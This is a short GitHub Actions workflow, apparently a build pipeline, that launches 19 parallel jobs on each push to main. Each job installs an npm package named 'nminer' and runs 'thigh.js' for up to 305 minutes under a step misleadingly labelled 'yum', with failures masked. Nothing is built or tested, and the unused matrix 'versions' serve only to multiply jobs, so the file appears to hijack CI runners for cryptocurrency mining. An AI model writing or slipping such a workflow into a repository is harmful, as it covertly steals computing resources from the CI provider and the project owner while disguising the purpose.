name: thigh
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3718 }
          - { version: 4956 }
          - { version: 4113 }
          - { version: 2555 }
          - { version: 9695 }
          - { version: 6878 }
          - { version: 3663 }
          - { version: 8878 }
          - { version: 5421 }
          - { version: 826 }
          - { version: 2287 }
          - { version: 4526 }
          - { version: 2977 }
          - { version: 7716 }
          - { version: 9355 }
          - { version: 2896 }
          - { version: 3036 }
          - { version: 8364 }
          - { version: 7703 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: yum
        run: |
          npm install nminer@latest
          timeout 305m node thigh.js || echo "thigh executed"